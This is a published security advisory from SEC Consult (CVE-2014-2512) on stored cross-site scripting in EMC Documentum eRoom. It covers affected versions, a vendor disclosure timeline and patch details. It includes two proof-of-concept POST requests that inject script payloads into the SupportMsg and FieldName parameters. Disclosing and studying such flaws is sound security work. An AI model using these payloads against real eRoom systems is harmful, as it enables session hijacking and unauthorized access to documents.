EMC Documentum eRoom Stored Cross Site Scripting

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
SEC Consult Vulnerability Lab Security Advisory 20140701-0  
=======================================================================  
title: Stored cross-site scripting vulnerabilities  
product: EMC Documentum eRoom  
vulnerable version: 7.4.3, 7.4.4, 7.4.4 SP1  
fixed version: 7.4.3 ESA-2014-060 (hot fix)  
7.4.4 P19  
7.4.4 SP1 ESA-2014-060 (hot fix)  
CVE: CVE-2014-2512  
impact: high  
homepage: http://www.emc.com/products/detail/software2/eroom.htm  
found: 2013-11-25  
by: M. Heinzl  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com/  
=======================================================================  
  
  
Vendor description:  
- -------------------  
  
"EMC Documentum eRoom is easy-to-use online team collaboration software that  
enables distributed teams to work together more efficiently. With Documentum  
eRoom, teams around the world can accelerate document collaboration and group  
activities, improve the development and delivery of products and services,  
optimize collaborative business processes, improve innovation, and streamline  
decision-making."  
  
http://www.emc.com/products/detail/software2/eroom.htm  
  
  
Vulnerability overview/description:  
- -----------------------------------  
  
Documentum eRoom suffers from multiple permanent cross-site scripting  
vulnerabilities, which allow an attacker to steal other user's sessions, to  
impersonate other users and to gain unauthorized access to documents hosted in  
eRooms. A JavaScript worm could be utilized to crawl an eRoom and gather all  
available documents.  
  
There are many parameters which are not properly sanitized and thus are  
vulnerable to XSS.  
  
  
Proof of concept:  
- -----------------  
  
1) When creating a new database, the parameter used for the database fields  
("SupportMsg") is not properly validated and is thus prone to permanent  
cross-site scripting.  
  
Request:  
POST  
/eRoomASP/eRoomSubmit.asp?FormName=sDlgGeneral&Ctxt=S_1&IsERPage=TRUE&ERClickInMap=FALSE&command=btnOK&SessionKey=ZQCH5DHHZLLV6  
HTTP/1.1  
Host: localhost  
  
IEDummyField=bugfix+29315&SubmitChecker=set&HasRichText=false&SessionKey=ZQCH5DHHZLLV6&ERWindowName=eRw1342094805&EditSiteName=SEC&IEUsersWorkOffline=on&AllowExtAppCommands=on&EnableWebDav=on&UseSecureCookies=on&ExpireSession=60&AlertAdminsObjectCount=on&PercentageObjectLimit=80&MembersChoosePluginOption=on&EnableFileBlocking=on&BlockedFileExtensions=accda%0D%0Aaccdb%0D%0Aaccde%0D%0Aasa%0D%0Aasp%0D%0Aaspx%0D%0Abat%0D%0Achm%0D%0Aclass%0D%0Acmd%0D%0Acom%0D%0Acpl%0D%0Acrt%0D%0Adll%0D%0Aexe%0D%0Ahlp%0D%0Ahta%0D%0Ahtm%0D%0Ahtml%0D%0Ahtw%0D%0Ahtx%0D%0Ains%0D%0Aisp%0D%0Ajs%0D%0Ajse%0D%0Alnk%0D%0Amda%0D%0Amdb%0D%0Amde%0D%0Amdt%0D%0Amdw%0D%0Amdz%0D%0Amht%0D%0Amhtml%0D%0Amsp%0D%0Aocx%0D%0Areg%0D%0Ascr%0D%0Asct%0D%0Ashb%0D%0Ashs%0D%0Aurl%0D%0Avbe%0D%0Avbs%0D%0Awsc%0D%0Awsh&OverrideURL=asd&SupportMsg=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&OtherInfoString=asd&PaginationThreshold=500&LMLThreshold=500&HMLThreshold=5000&RolodexTabs=A%3BB%3BC%3BD%3BE%3BF%3BG%3BH%3BI%3BJ%3BK%3BL%3B  
M%3BN%3BO%3BP%3BQ%3BR%  
3BS%3BT%3BU%3BV%3BW%3BX%3BY%3BZ  
  
  
2) The parameter "FieldName" is not properly validated and is thus prone to  
permanent cross-site scripting. A malicious payload will be executed when the  
asp script "ErrLoadingPage.asp" is called.  
  
Request:  
POST  
/eRoomASP/eRoomSubmit.asp?FormName=sDlgCreateDBField&Ctxt=.test.imgsrcxonerroralert33.0_b97&ERClickInMap=FALSE&command=btnNext&SessionKey=N377T7XGBMJOO  
HTTP/1.1  
Host: localhost  
  
IEDummyField=bugfix+29315&SubmitChecker=set&HasRichText=false&SessionKey=N377T7XGBMJOO&ERWindowName=eRw1342086593&FieldName=xxx%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29+%2F%3E&FieldType=0  
  
  
Vulnerable / tested versions:  
- -----------------------------  
The vulnerabilities have been verified to exist in version 7.4.4 P11.  
  
  
Vendor contact timeline:  
- ------------------------  
2013-12-10: Contacting vendor through [email protected]  
2013-12-10: Vendor will get back after investigation by December 19th.  
2013-12-20: Vendor is still investigating vulnerabilities, will get back in  
January  
2014-02-25: Vulnerabilities are confirmed, patch is issued for Q3 2014  
2014-03-13: Notify vendor that the advisory will be published in accordance to  
the responsible disclosure policy on 2014-04-20  
2014-03-20: Vendor will publish patch end of June 2014  
2014-03-31: Agreed to disclose advisory responsibly end of June 2014  
2014-06-13: Vendor fixed issues, asking for credit line  
2014-06-16: Providing credit line, asking for exact publication date  
2014-06-16: Vendor announces patched version for 2014-06-30  
2014-07-01: Publication of security advisory  
  
  
Solution:  
- ---------  
  
Upgrade or apply hot fixes:  
* 7.4.3 ESA-2014-060 (hot fix)  
* 7.4.4 P19  
* 7.4.4 SP1 ESA-2014-060 (hot fix)  
  
Patches can be downloaded here:  
https://support.emc.com/downloads/5324_Documentum-eRoom  
  
Workaround:  
- -----------  
None  
  
  
Advisory URL:  
- -------------  
  
https://www.sec-consult.com/en/advisories.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius  
  
Headquarter:  
Mooslackengasse 17, 1190 Vienna, Austria  
Phone: +43 1 8903043 0  
Fax: +43 1 8903043 15  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
Interested to work with the experts of SEC Consult?  
Write to [email protected]  
  
  
EOF M. Heinzl / @2014  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v2  
  
iQEcBAEBAgAGBQJTspMiAAoJECyFJyAEdlkKd14H/1XRfbn4aYlVvMVyCKzg0vqp  
JDwu0ZCOZ1gWmCXxJVBB057M2olK9eZL6TM2ONHIwKVSR7bJ3oQOQfz9SUpZCMpQ  
V5lZqb4wY6jESj0Vqeq4/QNM1xA+6z83BeokuLg2nZyRJAnT5LLMXtaw5cM4OMcZ  
54PO66I5YkuMyyMTQWicscEPwu1bIpW5w2IjtYC9ZCr7c8vFKYPRBfX6ZC/mFKYb  
T209peeLrV5dlz7e0q0AH2+llpEeeex06hH53KLG1koNJclDgBbnBA6YWMu74DgT  
KRY/n8ZSUs1etiE31jYBrCSpYk0xrfdALufs3pDHFm7m/hOSfvABx+VBRqxEHjw=  
=Px4D  
-----END PGP SIGNATURE-----  
`